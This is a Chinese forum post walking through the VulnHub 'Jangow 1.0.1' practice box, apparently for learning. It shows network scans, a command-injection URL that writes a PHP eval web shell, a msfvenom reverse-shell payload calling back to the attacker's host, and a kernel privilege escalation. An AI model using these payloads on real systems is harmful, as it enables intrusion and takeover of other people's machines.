电脑疯子技术论坛|电脑极客社区

 找回密码
 注册

QQ登录

只需一步,快速开始

[WEB前端技术] vulnhub系列2——Jangow: 1.0.1

[复制链接]
 楼主| zhaorong 发表于 2022-12-16 15:40:32 | 显示全部楼层 |阅读模式
前言:

习惯事与愿违。

vulnhub打靶系列文章

本次文章只用于技术讨论,学习,切勿用于非法用途,用于非法用途与本人无关!

所有环境均为在线下载的靶场,且在本机进行学习。

一、信息收集

首先进行主机的存活探测

netdiscover -r 192.168.56.0/24

QQ截图20221216152709.png

之后对其进行端口扫描

nmap -sV -Pn -sC 192.168.56.118

39.png

二、反弹shell提权

在网页上发现其一处可有命令执行

QQ截图20221216152824.png

对其进行一句话的写入,使用蚁剑连接

http://192.168.56.118/site/busque.php?buscar=echo '<?=@eval($_POST[1]);' >a.php

38.png

其权限很低

36.png

我们上传辅助提权工具,进行探测

33.png

但是在蚁剑上都提权失败,查询生成一个php马,将会话发送到msf上。通过蚁剑上传然后浏览器执行。

(这里不知道为啥只有443端口可以反弹成功。。。在这一步疑惑了很久)

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.56.105 lport=443 -f raw -o shell.php

28.png

调用交互shell

python3 -c "import pty;pty.spawn('/bin/bash');"

26.png

之后对其进行提权就成功了,使用CVE-2017-16695提权成功

22.png
您需要登录后才可以回帖 登录 | 注册

本版积分规则

手机版|小黑屋|VIP|电脑疯子技术论坛 ( Computer madman team )

GMT+8, 2025-1-23 03:55

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表